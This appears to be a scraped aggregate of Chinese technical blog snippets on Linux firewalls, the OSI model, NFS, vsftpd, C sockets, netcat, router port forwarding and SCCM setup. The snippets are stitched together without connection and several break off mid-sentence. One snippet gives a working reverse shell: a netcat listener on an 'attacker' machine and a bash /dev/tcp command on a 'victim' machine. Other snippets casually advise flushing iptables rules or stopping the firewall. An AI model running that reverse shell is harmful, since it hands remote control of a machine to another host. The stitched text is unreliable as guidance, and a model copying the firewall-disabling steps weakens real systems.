服务器端口

背景描述 防火墙是具有很好的保护作用。***者必须首先穿越防火墙的安全防线，才能接触目标计算机。在公司里数据安全是最重要的，要求安全部门进行全公司进行服务器防火墙安全搭建，在原有的基础上进行安全的防火墙设置，有效避免安全隐患等问题,建议大家还是花个十多分钟好好看一下防火墙的理论，这样便于后期问题排查，最后一小节有常用命令操作。 主要内容 1 详细了解防火墙相关配置； 2 详细解读相关安全配置方法； 3 详细解读firewalld防火墙的基础知识； 4 了解firewalld防火墙的配置； 5 了解firewalld防火墙相关命令的使用。 1.Linux防火墙概述 防火墙是指设置在不同网络或网络安全域之间的一系列部件的组合，它能增强机构内部网络的安全性。它通过访问控制机制，确定哪些内部服务允许外部访问，以及允许哪些外部请求可以访问内部服务。它可以根据网络传输的类型决定IP包是否可以传进或传出内部网。 防火墙通过审查经过的每一个数据包，判断它是否有相匹配的过滤规则，根据规则的先后顺序进行一一比较，直到满足其中的一条规则为止，然后依据控制机制做出相应的动作。如果都不满足，则将数据包丢弃，从而保护网络的安全。 Linux系统的防火墙功能是由内核实现的。在2.4 版及以后的内核中，包过滤机制是netfilter.CentOS 6管理工具是iptables，CentOS

计算机网络知识 　　网络体系结构 　　传输介质，传输技术，传输方法，传输控制 　　常用网络设备和各类通信设备的特点 　　Client-Server 结构，Browser-Server 结构 　　LAN（拓扑，存取控制，组网，网间互连） 　　Internet 和 Intranet 基础知识以及应用 　　网络软件，网络管理，网络性能分析 　　 OSI模型与TCP/IP网络体系结构 　　 1.OSI模型 　　OSI网络体系结构中共定义了七层，从高到低分别是： 　　 应用层（Application） ：直接为端用户服务，提供各类应用过程的接口和用户接口。诸如：HTTP，Telnet，FTP，SMTP，NFS等。 　　 表示层（Presentation） ：使应用层可以根据其服务解释数据的含义。通常包括数据编码的约定、本地句法的转换。诸如：JPEG，ASCII，GIF，DES，MPEG等。　　 　　 会话层（Session） ：负责管理远程用户或进程间的通信，通常包括通信控制、检查点设置、重建中断的传输链路、名字查找和安全验证服务。诸如：RPC，SQL，NFS等。 　　 传输层（Transport） ：实现发送端和接收端的端到端的数据分组传送，负责保证实现数据包无差错、按顺序、无丢失和无冗余的传输。其服务访问点为端口。代表性协议有： TCP （可靠，面向连接，建立连接时要进行3次握手

1.NFS简介 NFS（Network File System）即网络文件系统，它允许网络中的计算机之间通过网络共享资源。将NFS主机分享的目录，挂载到本地客户端当中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，在客户端端看起来，就像访问本地文件一样。 RPC，基于C/S模型。程序可以使用这个协议请求网络中另一台计算机上某程序的服务而不需知道网络细节，甚至可以请求对方的系统调用。 对于Linux而言，文件系统是在内核空间实现的，即文件系统比如ext3、ext4等是在Kernel启动时，以内核模块的身份加载运行的。 2.NFS原理 NFS本身的服务并没有提供数据传递的协议，而是通过使用RPC（远程过程调用 Remote Procedure Call）来实现。当NFS启动后，会随机的使用一些端口，NFS就会向RPC去注册这些端口。RPC就会记录下这些端口，RPC会开启111端口。通过client端和sever端端口的连接来进行数据的传输。在启动nfs之前，首先要确保rpc服务启动。 原理如下： 本地用户要访问nfs服务器中文件，先向内核发起请求，内核处理调用nfs模块及rpc client rpc client向rpc server发起连接 在连接之前，NFS服务除了启动nfsd本身监听的端口2049/tcp和2049/udp，还会启动其它进程（如mountd

1. 先用rpm -qa| grep vsftpd命令检查是否已经安装，如果ftp没有安装，使用yum -y install vsftpd 安装,(ubuntu 下使用apt-get install vsftpd) 2. service vsftpd start / service vsftpd restart 启动要让FTP每次开机自动启动，运行命令: chkconfig --level 35 vsftpd on 3. 设置ftp权限 vi /etc/vsftpd/vsftpd.conf 将anonymous_enable=YES 改为 anonymous_enable=NO ESC返回,输入“:wq”保存并推出 刷新防火墙 #iptables -F 其中vsftpd的主配置文件是： /etc/vsftpd/vsftpd.conf 实验一： 如果我不允许FTP匿名登陆，我们可以修改vsftpd的主配置文件来实现 #vi /etc/vsftpd/vsftpd.conf 把anonymous_enable=YES 改为anonymous_enable=NO 实验二： windows中FTP服务器可以设置欢迎词，最大连接数，那我们在Linux的FTP服务器中设置呢？我要回答的是：同样可以，我们同样可以vsftpd的主配置文件来实现# vi /etc/vsftpd/vsftpd.conf

攻击机: 　　apt-get install netcat 　　nc -lvvp 80 受害机: /bin/bash -i >& /dev/tcp/139.xxx.18.xx/80 0>&1nc 命令补充: -g<网关>：设置路由器跃程通信网关，最多设置8个； -G<指向器数目>：设置来源路由指向器，其数值为4的倍数； -h：在线帮助； -i<延迟秒数>：设置时间间隔，以便传送信息及扫描通信端口； -l：使用监听模式，监控传入的资料； -n：直接使用ip地址，而不通过域名服务器； -o<输出文件>：指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存； -p<通信端口>：设置本地主机使用的通信端口； -r：指定源端口和目的端口都进行随机的选择； -s<来源位址>：设置本地主机送出数据包的IP地址； -u：使用UDP传输协议； -v：显示指令执行过程； -w<超时秒数>：设置等待连线的时间； -z：使用0输入/输出模式，只在扫描通信端口时使用。 来源： https://www.cnblogs.com/mafeng/p/11781171.html

所有程序都需要编写检查错误的代码 一.基础知识 客户端与服务器之间将展开一段结构化对话，叫协议。 在C语言中，如果写一个与网络通信的程序，就需要新的数据流-套接字，套接字是双向的，既可以输入也可以输出 1.使用socket()函数创建一个套接字数据流 #include <sys/socket.h> int xxxx = socket(PF_INET, SOCK_STREAM, 0); xxxx是套接字名字 套接字与客户端程序通信，服务器需要经历，绑定端口，监听，接受连接，开始通信，四个阶段 服务启动时，服务器会为每项服务分配一个端口，服务器启动时，需要告诉操作系统将要使用哪个端口，这个过程叫做端口绑定。 2.这些代码将创建一个表示"互联网xxx端口"的套接字名 #include <arpa/inet.h> struct sockeaddr_in xxxx; xxxx.sin_family = PF_INET; xxxx.sin+port = (in_port_t)htons(端口号); xxxx.sin_addr.s_addr = htonl(INADDR_ANY); int x = bind (套接字名字, (struct sockaddr * ) &xxxx, sizeof(name)); 3.设置客户端连接服务器的排队数量 listen(套接字名字, xx) xx为人数

系统为centos7以上版本 需要配置安全组开放端口，然后是试一下链接，如果链接不上， -- 关闭linux 防火墙 systemctl stop firewalld.service 再试一试： ---------------------- 如果可以链接，说明此时是防火墙没有放行端口号导致，需要开启防火墙， -- 开启防火墙 systemctl start firewalld.service -- 永久添加端口 # firewall-cmd --permanent --add-port=8080/tcp -- 刷新配置，使其生效 sudo firewall-cmd --reload ---------------------- ok 来源： https://www.cnblogs.com/doudou2018/p/11775679.html

什么是nc nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具 nc的作用 （1）实现任意TCP/UDP端口的侦听，nc可以作为server以TCP或UDP方式侦听指定端口 （2）端口的扫描，nc可以作为client发起TCP或UDP连接 （3）机器之间传输文件 （4）机器之间网络测速 nc的控制参数不少，常用的几个参数如下所列： 1) -l 用于指定nc将处于侦听模式。指定该参数，则意味着nc被当作server，侦听并接受连接，而非向其它地址发起连接。 2) -p <port> 暂未用到（老版本的nc可能需要在端口号前加-p参数，下面测试环境是centos6.6，nc版本是nc-1.84，未用到-p参数） 3) -s 指定发送数据的源IP地址，适用于多网卡机 4) -u 指定nc使用UDP协议，默认为TCP 5) -v 输出交互或出错信息，新手调试时尤为有用 6）-w 超时秒数，后面跟数字 7）-z 表示zero，表示扫描时不发送任何数据 前期准备 准备两台机器，用于测试nc命令的用法 主机A：ip地址 10.0.1.161 主机B：ip地址 10.0.1.162 两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash： nc： command

虚拟服务器 虚拟服务器选项可以让Internet用户访问您LAN上的服务。 此功能对于提供在线服务如FTP，Web或游戏服务器非常有用。 对于每一虚拟服务器，您在路由器上定义一个公共端口用于重新定向到一个内部LAN IP地址和LAN端口。 实例：: 您正在LAN IP地址为192.168.0.50的PC上运行Web服务器，您的ISP 阻挡了端口80 命名虚拟服务器(如: Web服务器) 在您的LAN上输入设备的IP地址。 输入专用端口[80] 输入公共端口[8888] 选择协议（例如TCP） 对您希望添加的每个虚拟服务器，重复这些步骤。列表完成后，单击页面上部的保存设置。 使用此虚拟服务器输入项，在端口8888的所有Internet流量将重新定向到IP地址 192.168.0.50的端口80上的内部网络服务器。 虚拟服务器参数 名称为虚拟服务器分配一个有意义的名字，如Web服务器。在‘应用程序名’下拉菜单中有多种已知类型的虚拟服务器可用。选择其中一项，使用此类型服务器的标准值填满剩余的参数。IP地址您内部网络上提供虚拟服务的系统的IP地址，如192.168.0.50。 您可以从“计算机名”下拉菜单中的DHCP客户端列表中选择一台计算机，或您可以手动输入服务器计算机的IP地址。流量类型选择服务使用的协议。 常用选项-下拉菜单中可以选择UDP，TCP与UDP和TCP

2, SQL版本要和SCCM的版本对应 3, SQL排序规则：SQL_Latin1_General_CP1_CI_AS 4, 服务帐户都用专用的SQLAdmin来启用―启动类型全改为自动 5，DC创建容器 System Management 并赋权 在DC上打开ADSI编辑器 创建一个容器 System Management 打开ADSI编辑器---连接到默认命名上下文―右击System 新建对象―选择 container 写值为：System Management 在DC上打开dsa.msc 用户和计算机 打开高级功能并找到 System Management 授予Sccm计算机帐户的完全控制权限 并修改为 这个对象及全部后代 完全控制权限 （备注：如果以后要添加SEC辅助站点，同样也需要把SEC权限给加进去） 6，SCCM2012 与ADK版本对应 SCCM2012版本对应的ADK包如下： SCCM2012----------------------ADK8-------MDT SCCM2012 SP1---------------ADK8.1-------MDT2013/2012 SCCM2012 R2----------------ADK8.1-------MDT2013/2012 安装错误版本如SCCM2012 R2 安装 ADK8,则在后面可能出现